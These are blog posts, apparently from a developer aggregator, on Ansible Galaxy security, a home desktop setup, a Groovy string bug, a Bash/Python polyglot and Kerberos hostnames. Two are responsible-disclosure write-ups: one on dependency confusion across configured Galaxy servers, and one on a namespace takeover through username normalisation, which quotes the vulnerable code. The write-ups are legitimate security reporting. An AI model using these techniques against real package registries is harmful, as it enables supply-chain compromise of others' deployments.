Now the question I was curious about was: how would the tooling behave if different sources would offer identically named content? This was inspired by Alex Birsan: Dependency Confusion: How I Hacked Into Apple, Microsoft and Dozens of Other Companies and zofrex: Bundler is Still Vulnerable to Dependency Confusion Attacks (CVE - 2020 - 36327), who showed that the tooling for Python, Node.js and Ruby can be tricked into fetching content from "the wrong source", thus allowing an attacker to inject malicious code into a deployment. For the rest of this article, it's not important that there are different implementations of the hosting services, only that users can configure and use multiple sources at the same time. The problem is that, if the user configures their server_list to contain multiple Galaxy-compatible servers, like Ansible Galaxy and Automation Hub, and then asks to install a collection, the Ansible Galaxy CLI will ask every server in the list, until one returns a successful result. The exact order seems to differ between versions, but this doesn't really matter for the issue at hand. Imagine someone wants to install the redhat.satellite collection from Automation Hub (using ansible-galaxy collection install redhat.satellite). Now if their configuration defines Galaxy as the first, and Automation Hub as the second server, Galaxy is always asked whether it has redhat.satellite and only if the answer is negative, Automation Hub is asked. Today there is no redhat namespace on Galaxy, but there is a redhat user on GitHub, so The canonical answer to this issue is to use a requirements.yml file and setting the source parameter. This parameter allows you to express "regardless which sources are configured, please fetch this collection from here". That's is nice, but I think this not being the default syntax (contrary to what e.g. Bundler does) is a bad approach. Users might overlook the security implications, as the shorter syntax without the source just "magically" works. However, I think this is not even the main problem here. The documentation says: Once a collection is found, any of its requirements are only searched within the same Galaxy instance as the parent collection. The install process will not search for a collection requirement in a different Galaxy instance. But as it turns out, the source behavior was changed and now only applies to the exact collection it is set for, not for any dependencies this collection might have. For the sake of the example, imagine two collections: evgeni.test1 and evgeni.test2, where test2 declares a dependency on test1 in its galaxy.yml. Actually, no need to imagine, both collections are available in version 1.0.0 from galaxy.ansible.com and test1 version 2.0.0 is available from galaxy-dev.ansible.com. Now, given our recent reading of the docs, we craft the following requirements.yml:
collections:
- name: evgeni.test2
  version: '*'
  source: https://galaxy.ansible.com
In a perfect world, following the documentation, this would mean that both collections are fetched from galaxy.ansible.com, right? However, this is not what ansible-galaxy does. It will fetch evgeni.test2 from the specified source, determine it has a dependency on evgeni.test1 and fetch that from the "first" available source from the configuration. Take for example the following ansible.cfg:
[galaxy]
server_list = test_galaxy, release_galaxy, test_galaxy
[galaxy_server.release_galaxy]
url=https://galaxy.ansible.com/
[galaxy_server.test_galaxy]
url=https://galaxy-dev.ansible.com/
And try to install collections, using the above requirements.yml:
% ansible-galaxy collection install -r requirements.yml -vvv                 
ansible-galaxy 2.9.27
  config file = /home/evgeni/Devel/ansible-wtf/collections/ansible.cfg
  configured module search path = ['/home/evgeni/.ansible/plugins/modules', '/usr/share/ansible/plugins/modules']
  ansible python module location = /usr/lib/python3.10/site-packages/ansible
  executable location = /usr/bin/ansible-galaxy
  python version = 3.10.0 (default, Oct  4 2021, 00:00:00) [GCC 11.2.1 20210728 (Red Hat 11.2.1-1)]
Using /home/evgeni/Devel/ansible-wtf/collections/ansible.cfg as config file
Reading requirement file at '/home/evgeni/Devel/ansible-wtf/collections/requirements.yml'
Found installed collection theforeman.foreman:3.0.0 at '/home/evgeni/.ansible/collections/ansible_collections/theforeman/foreman'
Process install dependency map
Processing requirement collection 'evgeni.test2'
Collection 'evgeni.test2' obtained from server explicit_requirement_evgeni.test2 https://galaxy.ansible.com/api/
Opened /home/evgeni/.ansible/galaxy_token
Processing requirement collection 'evgeni.test1' - as dependency of evgeni.test2
Collection 'evgeni.test1' obtained from server test_galaxy https://galaxy-dev.ansible.com/api
Starting collection install process
Installing 'evgeni.test2:1.0.0' to '/home/evgeni/.ansible/collections/ansible_collections/evgeni/test2'
Downloading https://galaxy.ansible.com/download/evgeni-test2-1.0.0.tar.gz to /home/evgeni/.ansible/tmp/ansible-local-133/tmp9uqyjgki
Installing 'evgeni.test1:2.0.0' to '/home/evgeni/.ansible/collections/ansible_collections/evgeni/test1'
Downloading https://galaxy-dev.ansible.com/download/evgeni-test1-2.0.0.tar.gz to /home/evgeni/.ansible/tmp/ansible-local-133/tmp9uqyjgki
As you can see, evgeni.test1 is fetched from galaxy-dev.ansible.com, instead of galaxy.ansible.com. Now, if those servers instead would be Galaxy and Automation Hub, and somebody managed to snag the redhat namespace on Galaxy, I would be now getting the wrong stuff Another problematic setup would be with Galaxy and on-prem Ansible Automation Platform, as you can have any namespace on the later and these most certainly can clash with namespaces on public Galaxy. I have reported this behavior to Ansible Security on 2021-08-26, giving a 90 days disclosure deadline, which expired on 2021-11-24. So far, the response was that this is working as designed, to allow cross-source dependencies (e.g. a private collection referring to one on Galaxy) and there is an issue to update the docs to match the code. If users want to explicitly pin sources, they are supposed to name all dependencies and their sources in requirements.yml. Alternatively they obviously can configure only one source in the configuration and always mirror all dependencies. I am not happy with this and I think this is terrible UX, explicitly inviting people to make mistakes.

2 December 2021

Jonathan McDowell: Building a desktop to improve my work/life balance

ASRock DeskMini X300 It s been over 20 months since the first COVID lockdown kicked in here in Northern Ireland and I started working from home. Even when the strict lockdown was lifted the advice here has continued to be If you can work from home you should work from home . I ve been into the office here and there (for new starts given you need to hand over a laptop and sort out some login details it s generally easier to do so in person, and I ve had a couple of whiteboard sessions that needed the high bandwidth face to face communication), but day to day is all from home. Early on I commented that work had taken over my study. This has largely continued to be true. I set my work laptop on the stand on a Monday morning and it sits there until Friday evening, when it gets switched for the personal laptop. I have a lovely LG 34UM88 21:9 Ultrawide monitor, and my laptops are small and light so I much prefer to use them docked. Also my general working pattern is to have a lot of external connections up and running (build machine, test devices, log host) which means a suspend/resume cycle disrupts things. So I like to minimise moving things about. I spent a little bit of time trying to find a dual laptop stand so I could have both machines setup and switch between them easily, but I didn t find anything that didn t seem to be geared up for DJs with a mixer + laptop combo taking up quite a bit of desk space rather than stacking laptops vertically. Eventually I realised that the right move was probably a desktop machine. Now, I haven t had a desktop machine since before I moved to the US, realising at the time that having everything on my laptop was much more convenient. I decided I didn t want something too big and noisy. Cheap GPUs seem hard to get hold of these days - I m not a gamer so all I need is something that can drive a ~ 4K monitor reliably enough. Looking around the AMD Ryzen 7 5700G seemed to be a decent CPU with one of the better integrated GPUs. I spent some time looking for a reasonable Mini-ITX case + motherboard and then I happened upon the ASRock DeskMini X300. This turns out to be perfect; I ve no need for a PCIe slot or anything more than an m.2 SSD. I paired it with a Noctua NH-L9a-AM4 heatsink + fan (same as I use in the house server), 32GB DDR4 and a 1TB WD SN550 NVMe SSD. Total cost just under 650 inc VAT + delivery (and that s a story for another post). A desktop solves the problem of fitting both machines on the desk at once, but there s still the question of smoothly switching between them. I read Evgeni Golov s article on a simple KVM switch for 30. My monitor has multiple inputs, so that s sorted. I did have a cheap USB2 switch (all I need for the keyboard/trackball) but it turned out to be pretty unreliable at the host detecting the USB change. I bought a UGREEN USB 3.0 Sharing Switch Box instead and it s turned out to be pretty reliable. The problem is that the LG 32UM88 turns out to have a poor DDC implementation, so while I can flip the keyboard easily with the UGREEN box I also have to manually select the monitor input. Which is a bit annoying, but not terrible. The important question is whether this has helped. I built all this at the end of October, so I ve had a month to play with it. Turns out I should have done it at some point last year. At the end of the day instead of either sitting at work for a bit longer, or completely avoiding the study, I m able to lock the work machine and flick to my personal setup. Even sitting in the same seat that disconnect , and the knowledge I won t see work Slack messages or emails come in and feeling I should respond, really helps. It also means I have access to my personal setup during the week without incurring a hit at the start of the working day when I have to set things up again. So it s much easier to just dip in to some personal tech stuff in the evening than it was previously. Also from the point of view I don t need to setup the personal config, I can pick up where I left off. All of which is really nice. It s also got me thinking about other minor improvements I should make to my home working environment to try and improve things. One obvious thing now the winter is here again is to improve my lighting; I have a good overhead LED panel but it s terribly positioned for video calls, being just behind me. So I think I m looking some sort of strip light I can have behind the large monitor to give a decent degree of backlight (possibly bouncing off the white wall). Lots of cheap options I m not convinced about, and I ve had a few ridiculously priced options from photographer friends; suggestions welcome.

29 November 2021

Evgeni Golov: Getting access to somebody else's Ansible Galaxy namespace

TL;DR: adding features after the fact is hard, normalizing names is hard, it's patched, carry on. I promise, the longer version is more interesting and fun to read! Recently, I was poking around Ansible Galaxy and almost accidentally got access to someone else's namespace. I was actually looking for something completely different, but accidental finds are the best ones! If you're asking yourself: "what the heck is he talking about?!", let's slow down for a moment:
  • Ansible is a great automation engine built around the concept of modules that do things (mostly written in Python) and playbooks (mostly written in YAML) that tell which things to do
  • Ansible Galaxy is a place where people can share their playbooks and modules for others to reuse
  • Galaxy Namespaces are a way to allow users to distinguish who published what and reduce name clashes to a minimum
That means that if I ever want to share how to automate installing vim, I can publish evgeni.vim on Galaxy and other people can download that and use it. And if my evil twin wants their vim recipe published, it will end up being called evilme.vim. Thus while both recipes are called vim they can coexist, can be downloaded to the same machine, and used independently. How do you get a namespace? It's automatically created for you when you login for the first time. After that you can manage it, you can upload content, allow others to upload content and other things. You can also request additional namespaces, this is useful if you want one for an Organization or similar entities, which don't have a login for Galaxy. Apropos login, Galaxy uses GitHub for authentication, so you don't have to store yet another password, just smash that octocat! Did anyone actually click on those links above? If you did (you didn't, right?), you might have noticed another section in that document: Namespace Limitations. That says:
Namespace names in Galaxy are limited to lowercase word characters (i.e., a-z, 0-9) and _ , must have a minimum length of 2 characters, and cannot start with an _ . No other characters are allowed, including . , - , and space. The first time you log into Galaxy, the server will create a Namespace for you, if one does not already exist, by converting your username to lowercase, and replacing any - characters with _ .
For my login evgeni this is pretty boring, as the generated namespace is also evgeni. But for the GitHub user Evil-Pwnwil-666 it will become evil_pwnwil_666. This can be a bit confusing. Another confusing thing is that Galaxy supports two types of content: roles and collections, but namespaces are only for collections! So it is Evil-Pwnwil-666.vim if it's a role, but evil_pwnwil_666.vim if it's a collection. I think part of this split is because collections were added much later and have a much more well thought design of both the artifact itself and its delivery mechanisms. This is by the way very important for us! Due to the fact that collections (and namespaces!) were added later, there must be code that ensures that users who were created before also get a namespace. Galaxy does this (and I would have done it the same way) by hooking into the login process, and after the user is logged in it checks if a Namespace exists and if not it creates one and sets proper permissions. And this is also exactly where the issue was! The old code looked like this:
    # Create lowercase namespace if case insensitive search does not find match
    qs = models.Namespace.objects.filter(
        name__iexact=sanitized_username).order_by('name')
    if qs.exists():
        namespace = qs[0]
    else:
        namespace = models.Namespace.objects.create(**ns_defaults)
    namespace.owners.add(user)
See how namespace.owners.add is always called? Even if the namespace already existed? Yepp! But how can we exploit that? Any user either already has a namespace (and owns it) or doesn't have one that could be owned. And given users are tied to GitHub accounts, there is no way to confuse Galaxy here. Now, remember how I said one could request additional namespaces, for organizations and stuff? Those will have owners, but the namespace name might not correspond to an existing user! So all we need is to find an existing Galaxy namespace that is not a "default" namespace (aka a specially requested one) and get a GitHub account that (after the funny name conversion) matches the namespace name. Thankfully Galaxy has an API, so I could dump all existing namespaces and their owners. Next I filtered that list to have only namespaces where the owner list doesn't contain a username that would (after conversion) match the namespace name. I found a few. And for one of them (let's call it the_target), the corresponding GitHub username (the-target) was available! Jackpot! I've registered a new GitHub account with that name, logged in to Galaxy and had access to the previously found namespace. This felt like sufficient proof that my attack worked and I mailed my findings to the Ansible Security team. The issue was fixed in d4f84d3400f887a26a9032687a06dd263029bde3 by moving the namespace.owners.add call to the "new namespace" branch. And this concludes the story of how I accidentally got access to someone else's Galaxy namespace (which was revoked after the report, no worries).

19 November 2021

Evgeni Golov: A String is not a String, and that's Groovy!

Halloween is over, but I still have some nightmares to share with you, so sit down, take some hot chocolate and enjoy :) When working with Jenkins, there is almost no way to avoid writing Groovy. Well, unless you only do old style jobs with shell scripts, but y'all know what I think about shell scripts Anyways, Eric have been rewriting the jobs responsible for building Debian packages for Foreman to pipelines (and thus Groovy). Our build process for pull requests is rather simple:
  1. Setup sources - get the orig tarball and adjust changelog to have an unique version for pull requests
  2. Call pbuilder
  3. Upload the built package to a staging archive for testing
For merges, it's identical, minus the changelog adjustment. And if there are multiple packages changed in one go, it runs each step in parallel for each package. Now I've been doing mass changes to our plugin packages, to move them to a shared postinst helper instead of having the same code over and over in every package. This required changes to many packages and sometimes I'd end up building multiple at once. That should be fine, right? Well, yeah, it did build fine, but the upload only happened for the last package. This felt super weird, especially as I was absolutely sure we did test this scenario (multiple packages in one PR) and it worked just fine So I went on a ride though the internals of the job, trying to understand why it didn't work. This requires a tad more information about the way we handle packages for Foreman:
  • the archive is handled by freight
  • it has suites like buster, focal and plugins (that one is a tad special)
  • each suite has components that match Foreman releases, so 2.5, 3.0, 3.1, nightly etc
  • core packages (Foreman etc) are built for all supported distributions (right now: buster and focal)
  • plugin packages are built only once and can be used on every distribution
As generating the package index isn't exactly fast in freight, we tried not not run it too often. The idea was that when we build two packages for the same target (suite/version combination), we upload both at once and run import only once for both. That means that when we build Foreman for buster and focal, this results in two parallel builds and then two parallel uploads (as they end up in different suites). But if we build Foreman and Foreman Installer, we have four parallel builds, but only two parallel uploads, as we can batch upload Foreman and Installer per suite. Well, or so was the theory. The Groovy code, that was supposed to do this looked roughly like this:
def packages_to_build = find_changed_packages()
def repos = [:]
packages_to_build.each   pkg ->
    suite = 'buster'
    component = '3.0'
    target = "$ suite -$ component "
    if (!repos.containsKey(target))  
        repos[target] = []
     
    repos[target].add(pkg)
 
do_the_build(packages_to_build)
do_the_upload(repos)
That's pretty straight forward, no? We create an empty Map, loop over a list of packages and add them to an entry in the map which we pre-create as empty if it doesn't exist. Well, no, the resulting map always ended with only having one element in each target list. And this is also why our original tests always worked: we tested with a PR containing changes to Foreman and a plugin, and plugins go to this special target we have So I started playing with the code (https://groovyide.com/playground is really great for that!), trying to understand why the heck it erases previous data. The first finding was that it just always ended up jumping into the "if map entry not found" branch, even though the map very clearly had the correct entry after the first package was added. The second one was weird. I was trying to minimize the reproducer code (IMHO always a good idea) and switched target = "$ suite -$ component " to target = "lol". Two entries in the list, only one jump into the "map entry not found" branch. What?! So this is clearly related to the fact that we're using String interpolation here. But hey, that's a totally normal thing to do, isn't it?! Admittedly, at this point, I was lost. I knew what breaks, but not why. Luckily, I knew exactly who to ask: Jens. After a brief "well, that's interesting", Jens quickly found the source of our griefs: Double-quoted strings are plain java.lang.String if there s no interpolated expression, but are groovy.lang.GString instances if interpolation is present.. And when we do repos[target] the GString target gets converted to a String, but when we use repos.containsKey() it remains a GString. This is because GStrings get converted to Strings, if the method wants one, but containsKey takes any Object while the repos[target] notation for some reason converts it. Maybe this is because using GString as Map keys should be avoided. We can reproduce this with simpler code:
def map = [:]
def something = "something"
def key = "$ something "
map[key] = 1
println key.getClass()
map.keySet().each  println it.getClass()  
map.keySet().each  println it.equals(key) 
map.keySet().each  println it.equals(key as String) 
Which results in the following output:
class org.codehaus.groovy.runtime.GStringImpl
class java.lang.String
false
true
With that knowledge, the fix was to just use the same repos[target] notation also for checking for existence Groovy helpfully returns null which is false-y when it can't find an entry in a Map absent. So yeah, a String is not always a String, and it'll bite you!

6 November 2021

Evgeni Golov: I just want to run this one Python script

So I couldn't sleep the other night, and my brain wanted to think about odd problems Ever had a script that's compatible with both, Python 2 and 3, but you didn't want to bother the user to know which interpreter to call? Maybe because the script is often used in environments where only one Python is available (as either /usr/bin/python OR /usr/bin/python3) and users just expect things to work? And it's only that one script file, no package, no additional wrapper script, nothing. Yes, this is a rather odd scenario. And yes, using Python doesn't make it easier, but trust me, you wouldn't want to implement the same in bash. Nothing that you will read from here on should ever be actually implemented, it will summon dragons and kill kittens. But it was a fun midnight thought, and I like to share nightmares! The nice thing about Python is it supports docstrings, essentially strings you can put inside your code which are kind of comments, but without being hidden inside commnent blocks. These are often used for documentation that you can reach using Python's help() function. (Did I mention I love help()?) Bash on the other hand, does not support docstrings. Even better, it doesn't give a damn whether you quote commands or not. You can call "ls" and you'll get your directory listing the same way as with ls. Now, nobody would under normal circumstances quote ls. Parameters to it, sure, those can contain special characters, but ls?! Another nice thing about Python: it doesn't do any weird string interpolation by default (ssssh, f-strings are cool, but not default). So "$(ls)" is exactly that, a string containing a Dollar sign, an open parenthesis, the characters "l" and "s" and a closing parenthesis. Bash, well, Bash will run ls, right? If you don't yet know where this is going, you have a clean mind, enjoy it while it lasts! So another thing that Bash has is exec: "replace[s] the shell without creating a new process". That means that if you write exec python in your script, the process will be replaced with Python, and when the Python process ends, your script ends, as Bash isn't running anymore. Well, technically, your script ended the moment exec was called, as at that point there was no more Bash process to execute the script further. Using exec is a pretty common technique if you want to setup the environment for a program and then call it, without Bash hanging around any longer as it's not needed. So we could have a script like this:
#!/bin/bash
exec python myscript.py "$@"
Here "$@" essentially means "pass all parameters that were passed to this Bash script to the Python call" (see parameter expansion). We could also write it like this:
#!/bin/bash
"exec" "python" "myscript.py" "$@"
As far as Bash is concerned, this is the same script. But it just became valid Python, as for Python those are just docstrings. So, given this is a valid Bash script and a valid Python script now, can we make it do something useful in the Python part? Sure!
#!/bin/bash
"exec" "python" "myscript.py" "$@"
print("lol")
If we call this using Bash, it never gets further than the exec line, and when called using Python it will print lol as that's the only effective Python statement in that file. Okay, but what if this script would be called myscript.py? Exactly, calling it with Python would print lol and calling it with Bash would end up printing lol too (because it gets re-executed with Python). We can even make it name-agnostic, as Bash knows the name of the script we called:
#!/bin/bash
"exec" "python" "$0" "$@"
print("lol")
But this is still calling python, and it could be python3 on the target (or even something worse, but we're not writing a Halloween story here!). Enter another Bash command: command (SCNR!), especially "The -v option causes a single word indicating the command or file name used to invoke command to be displayed". It will also exit non-zero if the command is not found, so we can do things like $(command -v python3 command -v python) to find a Python on the system.
#!/bin/bash
"exec" "$(command -v python3   command -v python)" "$0" "$@"
print("lol")
Not well readable, huh? Variables help!
#!/bin/bash
__PYTHON="$(command -v python3   command -v python)"
"exec" "$ __PYTHON " "$0" "$@"
print("lol")
For Python the variable assignment is just a var with a weird string, for Bash it gets executed and we store the result. Nice! Now we have a Bash header that will find a working Python and then re-execute itself using said Python, allowing us to use some proper scripting language. If you're worried that $0 won't point at the right file, just wrap it with some readlink -f .

23 July 2021

Evgeni Golov: It's not *always* DNS

Two weeks ago, I had the pleasure to play with Foremans Kerberos integration and iron out a few long standing kinks. It all started with a user reminding us that Kerberos authentication is broken when Foreman is deployed on CentOS 8, as there is no more mod_auth_kerb available. Given mod_auth_kerb hasn't seen a release since 2013, this is quite understandable. Thankfully, there is a replacement available, mod_auth_gssapi. Even better, it's available in CentOS 7 and 8 and in Debian and Ubuntu too! So I quickly whipped up a PR to completely replace mod_auth_kerb with mod_auth_gssapi in our installer and successfully tested that it still works in CentOS 7 (even if upgrading from a mod_auth_kerb installation) and CentOS 8. Yay, the issue at hand seemed fixed. But just writing a post about that would've been boring, huh? Well, and then I dared to test the same on Debian Turns out, our installer was using the wrong path to the Apache configuration and the wrong username Apache runs under while trying to setup Kerberos, so it could not have ever worked. Luckily Ewoud and I were able to fix that too. And yet the installer was still unable to fetch the keytab from my FreeIPA server Let's dig deeper! To fetch the keytab, the installer does roughly this:
# kinit -k
# ipa-getkeytab -k http.keytab -p HTTP/foreman.example.com
And if one executes that by hand to see the a actual error, you see:
# kinit -k
kinit: Cannot determine realm for host (principal host/foreman@)
Well, yeah, the principal looks kinda weird (no realm) and the interwebs say for "kinit: Cannot determine realm for host":
  • Kerberos cannot determine the realm name for the host. (Well, duh, that's what it said?!)
  • Make sure that there is a default realm name, or that the domain name mappings are set up in the Kerberos configuration file (krb5.conf)
And guess what, all of these are perfectly set by ipa-client-install when joining the realm But there must be something, right? Looking at the principal in the error, it's missing both the domain of the host and the realm. I was pretty sure that my DNS and config was right, but what about gethostname(2)?
# hostname
foreman
Bingo! Let's see what happens if we force that to be an FQDN?
# hostname foreman.example.com
# kinit -k
NO ERRORS! NICE! We're doing science here, right? And I still have the CentOS 8 box I had for the previous round of tests. What happens if we set that to have a shortname? Nothing. It keeps working fine. And what about CentOS 7? VMs are cheap. Well, that breaks like on Debian, if we force the hostname to be short. Interesting. Is it a version difference between the systems?
  • Debian 10 has krb5 1.17-3+deb10u1
  • CentOS 7 has krb5 1.15.1-50.el7
  • CentOS 8 has krb5 1.18.2-8.el8
So, something changed in 1.18? Looking at the krb5 1.18 changelog the following entry jumps at one: Expand single-component hostnames in host-based principal names when DNS canonicalization is not used, adding the system's first DNS search path as a suffix. Given Debian 11 has krb5 1.18.3-5 (well, testing has, so lets pretend bullseye will too), we can retry the experiment there, and it shows that it works with both, short and full hostname. So yeah, it seems krb5 "does the right thing" since 1.18, and before that gethostname(2) must return an FQDN. I've documented that for our users and can now sleep a bit better. At least, it wasn't DNS, right?! Btw, freeipa won't be in bulsseye, which makes me a bit sad, as that means that Foreman won't be able to automatically join FreeIPA realms if deployed on Debian 11.

Next.